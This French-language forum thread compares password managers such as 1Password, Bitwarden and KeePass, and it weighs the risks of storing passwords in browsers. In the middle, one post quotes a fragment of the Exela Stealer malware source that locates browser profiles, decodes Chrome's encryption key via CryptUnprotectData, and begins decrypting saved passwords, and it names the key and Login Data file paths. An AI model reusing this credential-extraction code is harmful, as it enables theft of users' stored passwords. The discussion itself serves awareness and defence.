1Password 7 : la Rolls des gestionnaires de mot de passe

ethomit · Novembre 15, 2023, 4:21

1password reste la Rolls mais c’est aussi un des plus chers (c’est celui que j’utilise depuis des années sans regret)

Dans un 1er temps tu peux déjà basculer sur un outil gratuit du genre Bitwarden si tu ne veux pas trop prendre de risques, ce sera toujours mieux que stocker tes mots de passe dans un navigateur

Twin · Novembre 15, 2023, 5:37

Il s’est passé quoi ? Tu aurais un article ?

Andreac · Novembre 15, 2023, 7:12

Canard PC ou JV le mag, je ne sais plus

et pour @Lelolo , des dévs avaient le même soucis, lol aussi si t’as rien de plus intelligent à écrire

Andreac · Novembre 15, 2023, 7:13

Je pense que ça vaut le prix, je vais passer sur 1password assez rapidement et virer tout ce qui est en ligne. Heureusement, la majorité est avec double vérif.

AnA-l · Novembre 15, 2023, 8:18

Tu sais que 1password est en ligne hein ?

Andreac · Novembre 15, 2023, 8:41

« oui », je voulais dire tout ce qui est dans les navigateurs…
Tout mettre dans un coffre.
C’est l’idée non ?

Twin · Novembre 15, 2023, 9:16

J’ai peut-être mal lu, mais je ne vois pas où il est fait mention d’un vol de password depuis le navigateur dans cet article.

La question derrière, c’est est-ce que le stockage de mot de passe dans le navigateur est dangereux ? (pour l’instant je ne vois pas pourquoi ça le serait)

Andreac · Novembre 15, 2023, 9:31

Les conséquences c’était un vol total de tout à la fin. Des développeurs qui croyaient d’autres pseudos développeurs. Mais je ne me rappelle plus la source. C’était un gros article. Je pense jv le mag, j’en ai lu quelques uns ce week-end. J’avais un sacré retard.

Tomma · Novembre 15, 2023, 11:09

Oui, c’est bien dans JV Le Mag. J’en avais parlé il y a quelques jours dans la shoutbox.

Si quelqu’un sur Discord vous propose de télécharger un prototype de jeu sur le site itch.io, ne le faites pas. Le prototype contient un malware. En plus de pirater votre compte Discord, il volera vos mots de passe stockés dans le cache de vos navigateurs. Et enregistrera vos frappes au clavier, vos données système, fera des screenshots à votre insu, etc. Son petit nom : Exela Stealer.

Un article ici par exemple :

J’avais vu l’info circuler il y a un bon mois sur les réseaux sociaux, mais j’ai vu que des gens s’étaient encore fait avoir dernièrement. Certains ont perdu accès à leurs comptes google, etc. Des conséquences très graves donc.

GuillaumePan · Novembre 16, 2023, 6:34

Parce que leur extraction est généralement triviale en cas d’infiltration de la machine (via une intrusion sur le réseau de l’entreprise/un malware comme celui mentionné par @Tomma), soit en amenant l’utilisateur à visiter un site malveillant. On ne va pas donner les outils ici, mais passwords, cookies et historique des navigateurs constituent quelques-unes des nombreuses cibles post-exploitation de base pour un pentester/un attaquant.

A minima, il faut les protéger avec un master password solide.

Twin · Novembre 16, 2023, 6:45

Oui ma question c’était avec password, sinon je comprends bien que c’est open bar.

SkullyFM · Novembre 16, 2023, 8:18

D’après le code source du malware mentionné par Tomma c’est trivial sous Chrome et Chromium:

github.com

outhree/Exela-V2.0/blob/main/Exela.py#L118


      
                  'Edge' : self.local_app_data + os.path.join("\Microsoft", "Edge","User Data"),

                  'Vivaldi' : self.local_app_data + os.path.join("\Vivaldi","User Data"),

              }

              for _,path in full_browsers.items():

                  for f in profiles:

                      self.connect_to_database(path, f, "Local")

                      self.connect_to_database2(path, f, "Local") 

                      self.connect_to_database3(path, f, "Local")

                      self.connect_to_database4(path, f, "Local")

                      self.connect_to_database5(path, f, "Local")

          def get_encryption_key(self, value):

              local_state_path = os.path.join(value, "Local State")

              with open(local_state_path, "r", encoding="utf-8", errors="ignore") as f:

                  local_state = f.read()

                  local_state = json.loads(local_state)

          

              key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])

              key = key[5:]

              return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]

          def decrypt_pw(self, password, key):

              try:

La clé est stockées dans:
C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Local State

Les mots de passe sont dans une base sqlite ici:
C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\Login Data

Un simple script python que vous pouvez tester en local qui va afficher les mots de passe en clair:

Twin · Novembre 16, 2023, 9:12

Sous Firefox tu peux (et il faut !) mettre un master password pour protéger les mots de passe. J’espère qu’il est utilisé pour chiffrer le storage (mais je ne suis pas allé vérifier).

De toutes façons je n’utilise le password manager du navigateur que pour les credentials non « critiques » (e.g. GZ ), et MFA à tous les étages pour le reste.

dff0180 · Novembre 17, 2023, 7:14

Perso, je n’utilise le stockage des mots de passe des navigateurs qu’au taf (ce n’est que des accès applicatifs, le compte principal est en 2FA), chez moi, jamais.
Je n’utilises pas 1Password, même si c’est la rolls, je n’ai pas confiance dans le stockage en ligne, mais le plus simple Keepass, base locale en 1 seul fichier, sauvegardée sur le NAS et envoyée par mail (ouch, préhistoire) à chaque ajout, pour prise en compte dans l’appli mobile.

nashan · Novembre 17, 2023, 10:54

Un NAS perso plus fiable qu’un cloud ? On peut lancer le débat (mais je croyais qu’on avait déjà fait le tour sur ce point)

Lupuss · Novembre 17, 2023, 11:13

C’est surtout le « envoyée par email » qui m’a fait tiquer

dff0180 · Novembre 17, 2023, 12:34

Le NAS est en local, pour sauvegarder mes données (photos, docs). Je sync entre mon PC et lui, via mon réseau local.
Un mail, ben oui, le fichier est chiffré, il peut certes être intercepté, il faudra que l’attaquant soit là au bon moment (je ne laisse pas mes mails sur le serveur), les serveurs cloud, la rétention des données est bien plus longue.
Je pourrais effectivement copier ma BDD directement du PC au tél, j’avoue…

nzx · Novembre 17, 2023, 1:12

C’est se compliquer la vie pour pas grand chose. Et on ne le dira jamais assez, mais la très grande force de 1P c’est que c’est utilisable de PARTOUT, et très simplement. Mais chacun ses habitudes et choix.

nashan · Novembre 17, 2023, 1:54

À moins d’avoir un réseau local secondaire dédié à ton NAS (j’en doute ?), sinon, ton NAS est relié à internet, comme le serveur d’un cloud, donc.

(en revanche, un serveur de cloud est patché Day 1, avec une équipe entièrement dédié à sa sécurité, ajoute à cela le matos, les locaux et la stratégie de qualité professionnelle qui mettent tes données à l’abri, et tu comprendras pourquoi on ne peut pas considérer que la sécurité d’un NAS perso soit comparable à celle d’un cloud)

Twin · Novembre 17, 2023, 2:00

J’imagine que l’idée c’est que la probabilité de se faire pirater sa base locale Keepass sur son NAS, même relié à Internet, est plus faible qu’un leak de provider cloud avec exploitation systématique des données piratées.

(en gros ton setup local est moins safe dans l’absolu, mais moins susceptible d’être ciblé)

J’ai tendance à penser la même chose, mais c’est assez pifométrique je dois bien l’avouer.
Si vous avez des arguments dans un sens ou dans l’autre, sur ces deux probabilités, ça m’intéresse.